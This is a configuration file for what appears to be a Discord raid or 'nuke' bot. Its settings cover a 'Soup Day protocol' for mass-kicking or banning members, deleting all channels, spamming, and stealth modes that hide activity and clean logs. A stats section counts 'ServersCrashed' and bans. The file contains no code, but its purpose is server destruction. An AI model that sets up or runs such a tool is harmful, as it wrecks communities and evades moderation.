[Auth]
# Token. The most valuable thing you have!
Token =
# Would you like to become our tester? More about test functionality on GitHub!
Tester = False
# Bot version
Version = 1.0.0
# Mere mortals are not meant to know what this is for! (this is the most useless value)
UserId = 0

[Stats]
MessagesSend = 0
MembersKicked = 0
MembersBanned = 0
ChannelsDelete = 0
ChannelsCreate = 0
ServersCrashed = 0

[Lists]
# Whitelist. List of users the bot won't punish and who can execute commands.
Whitelist = [777550978743533578]
# Ignore list. List of users the bot won't try to harm. (Only applies to automated commands, e.g., !ban will work even if user is in this list)
Ignorelist = [777550978743533578]

[Logging]
# Logging status
LogStatus = True
# Logging type. 0 - It's like it exists, but it doesn't...; 1 - Minimal logging; 2 - Basic logging; 3 - Extended logging (+ bot logs); 4 - Full logging
LogType = 3
# Create "trophy"
Trophy = True

[Status]
# Bot status (static). Can be used for invisibility! (invisible)
BotStatus = online
# Activity type. Possible options: playing, streaming, listening, watching, competing, custom. More details in README.md
BotPresenceType = watching
# Bot activity description.
BotPresence = The end is a near...

[SoupDay]
# Punishment method. Kick or ban. Default is kick
Method = kick
# Change server icon when Soup Day protocol is activated
ChangeServerIcon = True
# Change server name when Soup Day protocol is activated
ChangeServerName = True
# Name to change the current server name to.
SoupDayServerName = Soup
# Message before punishment. Message content can be configured in text.txt. (File in config directory)
# WARNING! Significantly slows down punishment speed. (UPDATE!) - Works in stealth mode.
SoupDayKickMessage = False
# Create channel after deleting all existing ones (Laugh at the losers!)
EndChanel = False
# Channel name. FOLLOW DISCORD SYNTAX! (the-end, cool-chanel-btw and etc...)
EndChanelName = the-end
# Message sent when Soup Day protocol is activated. (Not sent in stealth mode)
Message = Soup Day has arrived...

[Settings]
# Stealth mode. In stealth mode, the bot won't send you any messages
StealthMode = False
# IN DEVELOPMENT! Hard stealth mode. Cleans logs after itself (femboy maid ^^).
HardStealthMode = False
# Message before punishment. Message content can be configured in text.txt. (File in config directory)
# WARNING! Significantly slows down punishment speed. (UPDATE!) - Works in stealth mode.
KickMessage = False
# Create channel after deleting all existing ones (Laugh at the losers!)
EndChanel = False
# Channel name. FOLLOW DISCORD SYNTAX! (the-end, cool-chanel-btw and etc...)
EndChanelName = the-end

[Delays]
# IN DEVELOPMENT! Custom delays.
CustomDelays = False
# There should be default delays here, but currently in the code the delays are set to zeros... Alas
BanDelay = 0
KickDelay = 0
SpamDelay = 0
RoleSpamDelay = 0
ChanelSpamDelay = 0
ChanelRemoveDelay = 0

[Testing] # these settings only apply if tester mode is active in the authorization section.
# IN DEVELOPMENT! Spy mode status. P.S. In this version, spy mode doesn't work at all. Check other versions on GitHub (maybe it exists in unstable?)
SpyModeStatus = False
# IN DEVELOPMENT! Statistics tracking.
Statistic = True
